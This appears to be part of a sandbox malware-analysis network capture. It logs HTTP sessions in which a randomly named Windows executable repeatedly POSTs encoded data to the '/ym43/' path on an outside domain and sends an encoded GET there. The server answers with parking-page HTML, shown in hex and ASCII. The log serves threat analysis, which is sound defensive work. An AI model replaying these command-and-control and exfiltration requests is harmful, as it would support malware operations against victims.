                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                        Nov 6, 2024 16:00:08.162719965 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzEyZGVkZTYtZWIzMS00MTU1LWFiZDAtOGJkMzYyOTk3ZTZkIiwicGFnZV90aW1lIjoxNzMwOTA1Mj


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.849714199.59.243.227805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:10.171973944 CET680OUTPOST /ym43/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.migraine-massages.pro
                                                                                        Origin: http://www.migraine-massages.pro
                                                                                        Referer: http://www.migraine-massages.pro/ym43/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6b 64 35 51 68 6b 69 72 45 2f 35 37 63 51 62 69 36 75 6c 37 51 38 57 71 61 4e 56 49 70 67 51 51 53 7a 68 41 33 72 53 47 43 46 59 52 59 74 59 65 59 35 70 30 65 66 6a 6d 6c 2b 4d 49 62 4e 33 44 75 63 6e 2f 62 35 59 58 39 63 77 65 7a 78 37 52 39 64 6a 44 72 77 70 38 2b 74 31 64 79 52 77 79 58 47 48 75 62 43 52 77 70 61 53 6c 37 4d 67 4e 4d 51 4e 51 2f 69 6f 48 7a 52 4c 50 6a 51 64 62 78 31 4b 78 30 76 32 74 52 64 74 52 72 4f 2b 34 77 41 76 34 43 61 4d 48 48 38 4b 4a 65 76 67 57 6e 50 4b 44 56 4b 6a 5a 51 55 69 51 43 4c 71 74 47 4f 4e
                                                                                        Data Ascii: A60d=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+ekd5QhkirE/57cQbi6ul7Q8WqaNVIpgQQSzhA3rSGCFYRYtYeY5p0efjml+MIbN3Ducn/b5YX9cwezx7R9djDrwp8+t1dyRwyXGHubCRwpaSl7MgNMQNQ/ioHzRLPjQdbx1Kx0v2tRdtRrO+4wAv4CaMHH8KJevgWnPKDVKjZQUiQCLqtGON
                                                                                        Nov 6, 2024 16:00:10.763211966 CET1236INHTTP/1.1 200 OK
                                                                                        date: Wed, 06 Nov 2024 15:00:10 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1154
                                                                                        x-request-id: b4bdd85e-a784-4815-bee8-c3b43970f04e
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                        set-cookie: parking_session=b4bdd85e-a784-4815-bee8-c3b43970f04e; expires=Wed, 06 Nov 2024 15:15:10 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                        Nov 6, 2024 16:00:10.763681889 CET212INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjRiZGQ4NWUtYTc4NC00ODE1LWJlZTgtYzNiNDM5NzBmMDR
                                                                                        Nov 6, 2024 16:00:10.763691902 CET395INData Raw: 6c 49 69 77 69 63 47 46 6e 5a 56 39 30 61 57 31 6c 49 6a 6f 78 4e 7a 4d 77 4f 54 41 31 4d 6a 45 77 4c 43 4a 77 59 57 64 6c 58 33 56 79 62 43 49 36 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 62 57 6c 6e 63 6d 46 70 62 6d 55 74 62 57 46 7a 63
                                                                                        Data Ascii: lIiwicGFnZV90aW1lIjoxNzMwOTA1MjEwLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cubWlncmFpbmUtbWFzc2FnZXMucHJvL3ltNDMvIiwicGFnZV9tZXRob2QiOiJQT1NUIiwicGFnZV9yZXF1ZXN0Ijp7fSwicGFnZV9oZWFkZXJzIjp7InJlZmVyZXIiOlsiaHR0cDovL3d3dy5taWdyYWluZS1tYXNzYWdlcy5wcm8veW00My


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.849715199.59.243.227805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:12.722563982 CET1697OUTPOST /ym43/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.migraine-massages.pro
                                                                                        Origin: http://www.migraine-massages.pro
                                                                                        Referer: http://www.migraine-massages.pro/ym43/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6c 4a 35 51 58 77 69 72 6c 2f 35 70 4d 51 62 72 61 75 67 37 51 39 55 71 65 70 76 49 70 6b 75 51 51 4c 68 42 52 58 53 58 48 6c 59 65 59 74 59 52 34 35 6f 70 75 65 2b 6d 6c 75 41 49 62 64 33 44 75 63 6e 2f 64 39 59 54 73 63 77 59 7a 78 34 51 39 64 56 4a 4c 77 42 38 34 45 4f 64 79 64 4b 7a 6a 4b 48 76 37 53 52 78 63 75 53 73 37 4d 2b 64 63 51 72 51 2f 76 32 48 33 78 78 50 6a 6c 4b 62 32 78 4b 39 53 4f 51 34 69 35 53 4e 71 2b 37 67 52 6f 4f 38 7a 53 73 61 42 42 2f 4f 39 48 6e 65 52 53 6d 4d 45 61 4b 54 79 5a 5a 4a 45 6d 39 6a 68 72 68 53 4a 66 4d 77 50 47 6a 61 73 37 65 65 57 39 49 42 36 37 72 6e 76 67 33 71 4a 39 70 36 2f 47 38 68 67 4a 46 42 5a 79 79 4b 79 58 59 37 72 5a 69 74 75 4d 6b 53 56 52 6c 50 79 46 49 78 43 6c 4c 36 74 77 4f 71 73 4d 50 4d 6c 37 78 6a 6e 4a 56 72 6a 34 39 63 39 34 73 69 6a 45 6d 64 44 65 62 67 46 53 50 45 49 4c 66 73 53 59 4f 56 42 4f 33 78 [TRUNCATED]
                                                                                        Data Ascii: A60d=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+elJ5QXwirl/5pMQbraug7Q9UqepvIpkuQQLhBRXSXHlYeYtYR45opue+mluAIbd3Ducn/d9YTscwYzx4Q9dVJLwB84EOdydKzjKHv7SRxcuSs7M+dcQrQ/v2H3xxPjlKb2xK9SOQ4i5SNq+7gRoO8zSsaBB/O9HneRSmMEaKTyZZJEm9jhrhSJfMwPGjas7eeW9IB67rnvg3qJ9p6/G8hgJFBZyyKyXY7rZituMkSVRlPyFIxClL6twOqsMPMl7xjnJVrj49c94sijEmdDebgFSPEILfsSYOVBO3xjfbqvVgqILMV+XdNen1T2RAKwgO61cdKBGTtU6jKl3QmG+QBfkGD4JujR4lTc0z/tuIYBJx+9OF9tJQBKcxyQ43QG2xVvqUyzlcU1L+jV+jFbiP/A1EP9YkYcNmC57f/7TmAYd1wIQngAXcZCIbf8j7xidyZeAHoMKSfKeE2tXd+zqAqGDxF8AIwg/czB1OJ3SPpW8G45sz5LeMX+3PUebSyG3tS3bImDOP13WYNTVEWYBgm33VW44DAHnnC2soOMlXP0OYBgYlRByyGG1XQ5WGWLHD9FncbIgt1P5yF4ubToQgBk17Yse/ZuRGbBKYe2y9iVENBYE0Ue+nUfORB0y24bIxfm7VsS1JGA5j5vOnpzFgsLfzAALrC5uMGqic57wbMKneXuMGI6oVKzsPvuvrdR4a03DSGqzYjMHTkhFGWtPdnKvOJkcZMXAJKWgNZXbDv+jMNXI1/5ZXN/ZezdLKGiVJ6uJm/lSk6V/jQFw1HgbBEQ7i0gPtcopdbM0BCoKbMqOgrL6A5m8Lc5BmeP6rNoRiUoGxtWTaD8ELVhh/Oe2jZm3Q5WywYF9MrpwLJGIGXrIF5jT2mVTyaSsP/j3LmNujSASwCnz2A8GYJ1a3tdpfG3izhqmHwcY4cWJv28nGZliDNQKfJLSU6NbPCFG7CEn7pRm1SBN [TRUNCATED]
                                                                                        Nov 6, 2024 16:00:14.095112085 CET1236INHTTP/1.1 200 OK
                                                                                        date: Wed, 06 Nov 2024 15:00:13 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1154
                                                                                        x-request-id: 15950622-cd8f-4728-b4b9-0039492f417f
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                        set-cookie: parking_session=15950622-cd8f-4728-b4b9-0039492f417f; expires=Wed, 06 Nov 2024 15:15:13 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                        Nov 6, 2024 16:00:14.095128059 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTU5NTA2MjItY2Q4Zi00NzI4LWI0YjktMDAzOTQ5MmY0MTdmIiwicGFnZV90aW1lIjoxNzMwOTA1Mj
                                                                                        Nov 6, 2024 16:00:14.095205069 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTU5NTA2MjItY2Q4Zi00NzI4LWI0YjktMDAzOTQ5MmY0MTdmIiwicGFnZV90aW1lIjoxNzMwOTA1Mj
                                                                                        Nov 6, 2024 16:00:14.095983028 CET1236INHTTP/1.1 200 OK
                                                                                        date: Wed, 06 Nov 2024 15:00:13 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1154
                                                                                        x-request-id: 15950622-cd8f-4728-b4b9-0039492f417f
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                        set-cookie: parking_session=15950622-cd8f-4728-b4b9-0039492f417f; expires=Wed, 06 Nov 2024 15:15:13 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                        Nov 6, 2024 16:00:14.096400976 CET1236INHTTP/1.1 200 OK
                                                                                        date: Wed, 06 Nov 2024 15:00:13 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1154
                                                                                        x-request-id: 15950622-cd8f-4728-b4b9-0039492f417f
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                        set-cookie: parking_session=15950622-cd8f-4728-b4b9-0039492f417f; expires=Wed, 06 Nov 2024 15:15:13 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                        Nov 6, 2024 16:00:15.149427891 CET1236INHTTP/1.1 200 OK
                                                                                        date: Wed, 06 Nov 2024 15:00:13 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1154
                                                                                        x-request-id: 15950622-cd8f-4728-b4b9-0039492f417f
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                        set-cookie: parking_session=15950622-cd8f-4728-b4b9-0039492f417f; expires=Wed, 06 Nov 2024 15:15:13 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.849716199.59.243.227805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:15.264066935 CET387OUTGET /ym43/?A60d=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRRotDS7tV9/yFnz3DJaYsKbhs+4gmff4HURwuAtNrFLN6oA==&QftlZ=CnaPg8j HTTP/1.1
